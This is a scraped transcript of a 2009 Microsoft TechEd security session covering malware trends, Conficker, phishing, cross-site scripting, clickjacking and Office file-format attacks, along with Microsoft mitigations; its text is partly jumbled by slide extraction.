Graham Calladine, David Hoyle Security Center of Excellence Microsoft Session Code: SIA313 Session Objectives & Takeaways To learn and understand: Current Attack Trends that Microsoft.
Download ReportTranscript Graham Calladine, David Hoyle Security Center of Excellence Microsoft Session Code: SIA313 Session Objectives & Takeaways To learn and understand: Current Attack Trends that Microsoft.
Graham Calladine, David Hoyle Security Center of Excellence Microsoft Session Code: SIA313
Session Objectives & Takeaways
To learn and understand: Current Attack Trends that Microsoft is seeing Attack Vectors Mitigation Strategies with Windows Products
10 Years…
We have come a long way since Melissa 2003-2004 difficult times Blaster/Slammer – Was horrible – Hit Home Users hard Conficker emerged in a different s/w industry – Did not hit home users hard Partnerships MS Response Alliance & Internet Consortium for Advanced Security on the Internet & CWG
WW Threat Trends
Not a simple trend – Geographically Diverse Miscellaneous Trojans (inc rouge s/w) most prevalent WORMS 2 nd most prevalent Password Stealers & Monitoring tools Breaches – Data Scarce – (datalossdb.org) Top is stolen equipment, twice as many incidents as intrusion But equipment loss is easily reported!
Data: Microsoft SIR v7 Report
Geographical Trends
8 Locations with most infected machines USA,UK,France,Italy – Trojans China, language specific browser threats Brazil, malware targeting online banking Spain, Korea, WORMS targeting online gamers Data Source: SIR V7 Report Pg 40
Threat Landscape is getting better?
Improvement in Software Development Practice Software Development Lifecycle (SDL) Geoff 1min Video Increased Availability of Automatic Patch Update Process Patch Tuesday and Auto Updates However, unpatched client is primary initial infection vector Social engineering techniques to mislead Victims Attacker still finds success with a variety of techniques for manipulating people
SANS Analysis
The Top Cyber Security Risks” 2009 September Application Vulnerabilities Exceed OS Vulnerabilities Web Application Attacks Cross Site Scripting, PHP File Include, and SQL Injection Windows: Conficker/Downadup Cited from SANS “The Top Cyber Security Risks” 2009 September, http://www.sans.org/top-cyber-security-risks/
Attackers use social engineering techniques – Human Emotion FEAR Desire
: Protection I got: Rogue Software
Trust
I got : fake contents, etc.
malicious downloads, etc I got : Banking Malware, Phishing, Spam, and File Format Infections, etc.
Microsoft Security Intelligence Report, 2008 July through December 2008
Attack Vectors and Trends
Current attacks in the wild Rogue Security Software and Worm Browser Based Attacks Phishing Cross Site Scripting Clickjacking File Format Attacks
Attack Vectors and Trends Rogue Security Software and Worms
Browser Based Attacks File Format Attack
Rogue Unwanted Software
3 4 1 2 5 6 7 8 9 10
Rank Family
Win32/Zlob Win32/Vundo Win32/ZangoSearchAssistant Win32/Taterf Win32/ZangoShoppingreports
Most Significant Category
Trojan Downloaders & Droppers Trojan Downloaders & Droppers
Infected Machines
4,371,508 3,772,217 Miscellaneous Trojans Adware Worms Adware Miscellaneous Trojans 3,635,207 3,326,275 1,916,446 1,752,252 1,691,393 Win32/FakeSecSen Win32/Hotbar Win32/Agent Miscellaneous Trojans Adware Miscellaneous Trojans 1,575,648 1,477,886 1,289,178
Rogue Security Software 1
Use Fear to convince victims Win32/Renos Family
Rogue Security Software 2
Use the same logic Win32/FakeXPA Family
A Rogue Software Real Sample
http://blogs.technet.com/mmpc/archive/2009/08/20/winwebsec-on-youtube.aspx
Use your Desire There is no security issue or vulnerability in YouTube.com.
Rogue Software
Win32/FakeVimes have become more prevalent in the last 2 months and Win32/PrivacyCenter Distributed via fake online scanners
Worms: Win32/Conficker.A to E
Win32/Conficker is a worm that infects other computers across a network by exploiting a vulnerability in the Windows Server service (SVCHOST.EXE) On October 23, 2008 , Microsoft released critical security update
MS08-067
Allow remote code execution if an affected system received a specially crafted Remote Procedure Call ( RPC ) request On November 21, 2008 , the first significant worm that exploits MS08-067 was discovered The first variant discovered, Worm:Win32/Conficker.A, only uses MS08-067 exploits to propagate On December 29 2008 , a significantly more dangerous variant, Win32/Conficker.B, was discovered Exploits the MS08-067 vulnerability but uses additional methods to propagate.
It attempts to spread itself to other computers on the network Combining the vulnerability with social engineering to introduce and spread the worm in an organization Continues… http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Win32%2fConficker
Social Engineering
by e-mailing infected files with official-sounding names to people at a company like “Corporate Policy.PDF”
Worms: Win32/Conficker.A to E
Release D, monitors 500/50,000 domain names/day for payloads… Still is Conficker Working Group (CWG) formed Jan09 Many people from well know sec groups/researchers Implemented defense DNS strategy Kaspersky & OpenDNS – calc’ed 1Y of names All 110 TLDs involved & signed up Rapid, effective collaboration – keeps Conficker constrained
Published Articles for Conficker
Knowledge Base article KB962007 MMPC blog (http://blogs.technet.com/mmpc) Get Protected, Now! (October 23, 2008) A Quick Update About MS08-067 Exploits (November 17, 2008) Just in Time for New Year’s… Banload (January 13, 2009) (January 22, 2009) (December 31, 2008) MSRA Released Today Addressing Conficker and Centralized Information About the Conficker Worm Information about Worm:Win32/Conficker.D
(March 27, 2009)
Mitigations
Get the latest computer updates Install and update anti-malware signatures Run an up-to-date scanning and removal tool Use caution with attachments and file transfers Use caution when clicking on links to web pages Standard user rights Protect yourself from social engineering attacks User Security Best Practices such as strong Password Policy Keep eye on vulnerabilities and follow the guideline from the trusted source Use recent technologies and systems that can reduce the risk on exploiting
Attack Vectors and Trends
Rogue Security Software and worms
Browser Based Attacks
File Format Attack
Browser Based Attacks
Phishing Cross Site Scripting ClickJacking
Browser Based Attacks Phishing
Cross Site Scripting ClickJacking
Phishing: Overview
Phishing is a method of identity theft that tricks Internet users into revealing personal or financial information online.
Phishing Scam Samples
Social engineering techniques “Verify your account” “If you don't respond within 48 hours, your account will be closed” “Dear Valued Customer” “Click the link below to gain access to your account”
Spear Phishing and Whaling
Spear phishing - highly targeted phishing Send email messages that appear genuine to all employees and members within a community Whaling - involves targeted attacks on senior executives and other high ranking people
Phishing Trends in Industry
APWG: Anti Phishing Working Group Report, 2009 1H http://www.antiphishing.org/reports/apwg_report_h1_2009.pdf
Phish Tank: Current Phish Sites
Live Phish site can be found http://www.phishtank.com/
Phishing with Hotmail
Illegally acquired by a phishing scheme and exposed to a website Microsoft Recommends: Renew their passwords for Windows Live IDs every 90 days For administrators, make sure you approve and authenticate only users that you know and can verify credentials As phishing sites can also pose additional threats, install and keep anti-virus software up to date
Techniques
Man-in-the-middle attacks Proxies, DNS Cache Poisoning, etc URL Obfuscation attacks Bad Domain Name, Friendly Login URL’s, Host Name/URL Obfuscation, etc Etc…
Anti-Phishing
IE 8 SmartScreen
Mitigations
Use an up-to-date anti-malware product from a known, trusted source, and keep it updated.
Use the most recent version of your Web browser, and keep it up to date by applying security updates and service packs in a timely fashion.
Use a robust spam filter to guard against fraudulent and dangerous e-mail.
You can add sites you trust to the Trusted Sites zone with more than middle security level. Follow the guidance to take actions http://www.microsoft.com/mscorp/safety/technologie s/antiphishing/guidance.mspx
Browser Based Attacks
Phishing
Cross Site Scripting
ClickJacking
Cross Site Scripting: Overview
Cross-Site Scripting (XSS): Occurs whenever an application reads user data, and embeds that user data in Web responses without encoding or validating the user data Common vulnerabilities that make Web-based applications susceptible to cross-site scripting attacks: Improper input validation Failing to encode output Trusting data from shared resources
Cross Site Scripting in News
October 2005 February 2006 June 2008 December 2008 April 2009 MySpace “Samy” worm Facebook Yahoo Mail American Express Twitter http://twittercism.com/remove-stalkdaily/
http://xssed.com/ - live XSSed
Types of Cross-Site Scripting
Two major types of cross-site scripting attacks: Type 1: Non-Persistent Often referred to as reflected cross-site scripting Requires some level of social engineering Type 2: Persistent Stored cross-site scripting One attack can affect multiple users Type 0: DOM-Based 38
Type 1: Non-Persistent Cross-Site Scripting
Web Server Congratulations! You won a prize, please click here to claim your prize!
id=
[malicious code]
… User Malicious User 39
Type 2: Persistent Cross-Site Scripting
Malicious User Web Server
Blog Comment:
Hello, this article was helpful!
[malicious code]
Thanks, Kevin Database
Blog Comment:
Hello, this article was helpful!
[malicious code]
Thanks, Kevin User User User 40
Mitigation Strategies
Server Sides Validate all untrusted input Encode any Web response data that could contain user or other untrusted input Use built-in ASP.NET protection via the ValidateRequest option Use the System.Web.HttpCookie.HttpOnly property Use the ,
Microsoft Anti-Cross Site Scripting Library V3.1
New features An expanded white list that supports more languages Performance improvements Performance data sheets (in the online help) Support for Shift_JIS encoding for mobile browsers A sample application Security Runtime Engine (SRE) HTTP module
Security Runtime Engine (SRE) HTTP module
Ideally, you do not need to change your code!
In your your web.config,
SecurityRuntimeEngine.AntiXssModule
"/> In antixssmodule.config,
Anti-Cross Site Scripting in Action
Microsoft Anti-Cross Site Scripting Library V3.1
Mitigation Strategies
Client Sides IE8 XSS Filter
Anti-Cross Site Scripting in Action
IE8 XSS Filter with Microsoft Application Compatibility Tool Kit
Browser Based Attacks
Phishing Cross Site Scripting
ClickJacking
ClickJacking: Overview
Clickjacking is : an attack that tricks the victim into initiating commands on a website that they did not intend. Use iframes and web page layers in DHTML such that you overlay a potentially malicious button (for example) on top of an existing legitimate web page.
A ClickJacking Example
Suppose that a hacker site has the following source code…
Mitigation
Use FrameBreaker Script Use X-Frame-Options Header for IE8 HTTP response header named
X-FRAME-OPTIONS
The OPTIONS value contains the token within a frame IIS Manager, content="DENY" /> in
section, or Options", "Deny”).DENY
ClickJacking:
FrameBreaker and IE8 Defense
Attack Vectors and Trends
Rogue Unwanted Software Browser Based Attacks
File Format Attack - Office
File Format Attack: Overview
This class of vulnerability is described as parser
vulnerabilities.
Attacker creates a specially crafted document that takes advantage of an error in how the code processes or parses the file format.
Increasingly, attackers are using common file formats as transmission vectors for exploits.
Office format and PDF format
File Format Attack Trend
Recent (2H08) saw a sharp increase in the number of file format–based attacks, Often in the form of spear phishing and whaling attacks, the victim opens the attachment Or at a malicious / compromised web site, and the malicious code forces browsers to a malicious document, which is opened by victim
Binary Office File Format vs. Open XML format
Office 2003 (and lower) Binary Format OLE Structured Storage outer format File system within a file!
Complex file format complete with FAT Table Sectors Streams (like files) Another application specific inner format within a stream!
Header STRM1 STRM3 STRM2 STRM4
Examining The File
Requires a hex editor + expert knowledge Interesting strings in a stream near the beginning of the malicious files!
What could possibly go wrong?
Office 2007 Open XML File Format
Safety was a design goal from the beginning Designed under the SDL ZIP file container with ‘XML parts’ Also non-XML parts (typically binary data like embedded images or OLE objects) Non-XML parts can be disabled by policy Rename to .zip and open with zip file viewer!
Historical Data
Office Security Bulletin Trend (by quarter)
30 25 20 15 10 5 0
Newer is Better % of vulns affecting Office 2007 since Jan 2007 28% Vulnerable
1 2 3 4 1 2 3 4 1 2 3 4 1 2 3 4 1 2 2004 2005 2006 2007 2008
72% Not Vulnerable
Layered Defenses
Harden the Attack Surface
Security Engineering Security Development Lifecycle Foundation Intensive Distributed Fuzzing Integrate OS Advances Support for DEP/NX Leverage WIC Image Parsers Robust & Agile Cryptography
Reduce the Attack Surface
File Block Block unused or legacy file formats Easy policy enforcement View allows read-only access Tied in with Protected View for formats between block and allow Office File Validation Binary files Runs automatically on open Evaluates file for ‘correctness’ Protects against unknown exploits Faster updates for changes to rules
Gatekeeper vs MSRC cases
Protected Viewer ‘Sandbox’
Word, Excel, PPT files can run in the ‘sandbox’ Prevents harmful documents from damaging user data and OS Help users make better trust decisions
Protected Viewer
Office - FileFormats
Observations on XP
Malicious PPT drops an EXE and a clean PPT on users desktop The EXE creates a ‘.log’ file in users temp folder and executes it.
The malware creates 2 binaries in system32 and modifies HKLM registry keys The binaries are injected into SYSTEM processes like winlogon.exe
Requires regular user rights Requires regular user rights Requires admin rights Requires admin rights
Observations on Vista
Malicious PPT drops an EXE and a clean PPT on users desktop The EXE creates a ‘.log’ file in users temp folder and executes it.
The malware creates 2 binaries in system32 and modifies HKLM registry keys The binaries are injected into SYSTEM processes like winlogon.exe
Requires regular user rights Requires regular user rights Requires admin rights Requires admin rights
Better Together
File Block GateKeeper Standard User / UAC UAC “Dark Roast”
Mitigations
Configure your computer to use Microsoft Update Ensure that Microsoft security update MS06-027 has been applied to any affected software in your environment: http://www.microsoft.com/technet/security/bulletin/ MS06-027.mspx.
Keep your third-party software up to date. Updates for Adobe products can be downloaded from http://www.adobe.com/downloads/updates/ . If possible, upgrade your software applications to the most recent versions, since these demonstrate lower rates of attack.
Avoid opening attachments or clicking links to documents in e-mail or instant messages that are received unexpectedly or from an unknown source.
Use up-to-date antivirus software from a known, trusted source that offers real-time protection and continually updated definition files to detect and block exploits.
Summary
Trends are WORMS, Rogue, FileFormat Varies world wide Security Community effort in industry to keep on top Technology evolving fast to solve root cause (GateKeeper) Updates, Virus Checkers, Good Risk Management are key, Security Standards Lockdowns go a long way
Quick Case Study
AppLocker + Windows only rules + App rules No execute for standard users for writable areas Bitlocker Lockdown to reduce attack surface Virus checker/Updates etc… Gives a solid defense in-depth client build!
Summary
Both security vendors and IT professionals should Adjust their risk management processes appropriately to help ensure that all operating systems and applications are protected (ISO 27000, COBIT, MS Sec Risk Guide) Keep updating wide range of potential security issues Take appropriate actions based on your risk assessment As individual to protect against malicious code Keep update the security patches and anti-virus signatures, and if possible upgrade to newer software Educate themselves for potential security risks IT professionals and consumers should take advantage of the defense-in-depth technologies, such as firewalls, antivirus programs, and antispyware programs available from trusted sources…
Summary
Most important of all… Stay informed & up to date Microsoft Malware Protection Center Microsoft Security Update Guide Microsoft Security Engineering Center Microsoft Security Response Center Microsoft SIR v7 Report Microsoft AV Security Essentials End to End trust Microsoft Security Development Lifecycle Common Vulnerabilities and Exposures : http://cve.mitre.org
Track Resources
Common Vulnerabilities and Exposures : http://cve.mitre.org
Nation Vulnerability Database : http://nvdnist.gov
www.securityfocus.com
, www.secunia.com
, www.securitytracker.com
Microsoft Malware Protection Center , Microsoft Security Update Guide , Microsoft Security Engineering Center , Microsoft Security Response Center , Microsoft SIR v7 Report , Microsoft AV , Security Essentials , End to End trust, Microsoft Security Development Lifecycle
Resources
www.microsoft.com/teched Sessions On-Demand & Community www.microsoft.com/learning Microsoft Certification & Training Resources http://microsoft.com/technet Resources for IT Professionals http://microsoft.com/msdn Resources for Developers
Related Content
SIA-205: SDL-Agile: Microsoft’s Approach to Security for Agile Projects
Complete an evaluation on CommNet and enter to win an Xbox 360 Elite!
© 2009 Microsoft Corporation. All rights reserved. Microsoft, Windows, Windows Vista and other product names are or may be registered trademarks and/or trademarks in the U.S. and/or other countries.
The information herein is for informational purposes only and represents the current view of Microsoft Corporation as of the date of this presentation. Because Microsoft must respond to changing market conditions, it should not be interpreted to be a commitment on the part of Microsoft, and Microsoft cannot guarantee the accuracy of any information provided after the date of this presentation. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.